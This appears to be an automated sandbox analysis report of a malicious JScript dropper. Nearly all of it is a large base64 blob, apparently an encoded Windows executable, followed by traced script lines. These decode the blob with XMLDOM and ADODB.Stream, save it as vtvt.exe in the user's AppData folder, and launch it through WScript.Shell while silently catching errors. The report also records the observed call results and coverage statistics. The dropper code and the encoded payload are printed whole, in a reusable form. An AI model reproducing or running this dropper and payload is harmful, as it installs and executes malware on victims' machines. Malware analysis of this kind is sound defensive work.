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";
                            8
                            var silver = WScript.CreateObject ( "Microsoft.XMLDOM" );
                            • Windows Script Host.CreateObject("Microsoft.XMLDOM") ➔
                            9
                            var sinema = silver.createElement ( "tmp" );
                            • createElement("tmp") ➔
                            10
                            sinema.dataType = "bin.base64";
                              11
                              sinema.text = aso_ibora;
                                12
                                var sugar = WScript.CreateObject ( "ADODB.Stream" );
                                • Windows Script Host.CreateObject("ADODB.Stream") ➔
                                13
                                sugar.Type = 1;
                                  14
                                  sugar.Open ( );
                                  • Open() ➔ undefined
                                  15
                                  sugar.Write ( sinema.nodeTypedValue );
                                  • Write() ➔ undefined
                                  16
                                  var wshShell = WScript.CreateObject ( "WScript.Shell" );
                                  • Windows Script Host.CreateObject("WScript.Shell") ➔
                                  17
                                  var tempdir = wshShell.ExpandEnvironmentStrings ( "%temp%" );
                                  • ExpandEnvironmentStrings("%temp%") ➔ "C:\Users\jones\AppData\Local\Temp"
                                  18
                                  var appdatadir = wshShell.ExpandEnvironmentStrings ( "%appdata%" );
                                  • ExpandEnvironmentStrings("%appdata%") ➔ "C:\Users\jones\AppData\Roaming"
                                  19
                                  var path = "vtvt.exe";
                                    20
                                    var is_temp = false;
                                      21
                                      if ( is_temp )
                                        22
                                        {
                                          23
                                          path = tempdir + "\\" + path;
                                            24
                                            }
                                              25
                                              else
                                                26
                                                {
                                                  27
                                                  path = appdatadir + "\\" + path;
                                                    28
                                                    }
                                                      29
                                                      sugar.SaveToFile ( path, 2 );
                                                      • SaveToFile("C:\Users\jones\AppData\Roaming\vtvt.exe",2) ➔ undefined
                                                      30
                                                      if ( path.endsWith ( ".jar" ) )
                                                      • "C:\Users\jones\AppData\Roaming\vtvt.exe".endsWith(".jar") ➔ false
                                                      31
                                                      {
                                                        32
                                                        wshShell.run ( "java -jar \"" + path + "\"" );
                                                          33
                                                          }
                                                            34
                                                            else
                                                              35
                                                              if ( path.endsWith ( ".vbs" ) || path.endsWith ( ".wsf" ) )
                                                              • "C:\Users\jones\AppData\Roaming\vtvt.exe".endsWith(".vbs") ➔ false
                                                              • "C:\Users\jones\AppData\Roaming\vtvt.exe".endsWith(".wsf") ➔ false
                                                              36
                                                              {
                                                                37
                                                                wshShell.run ( "wscript \"" + path + "\"" );
                                                                  38
                                                                  }
                                                                    39
                                                                    else
                                                                      40
                                                                      {
                                                                        41
                                                                        wshShell.run ( "\"" + path + "\"" );
                                                                        • run(""C:\Users\jones\AppData\Roaming\vtvt.exe"") ➔ 0
                                                                        42
                                                                        }
                                                                          43
                                                                          }
                                                                            44
                                                                            catch ( err )
                                                                              45
                                                                              {
                                                                                46
                                                                                }
                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:15.5%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:16.4%
                                                                                    Total number of Nodes:1386
                                                                                    Total number of Limit Nodes:22
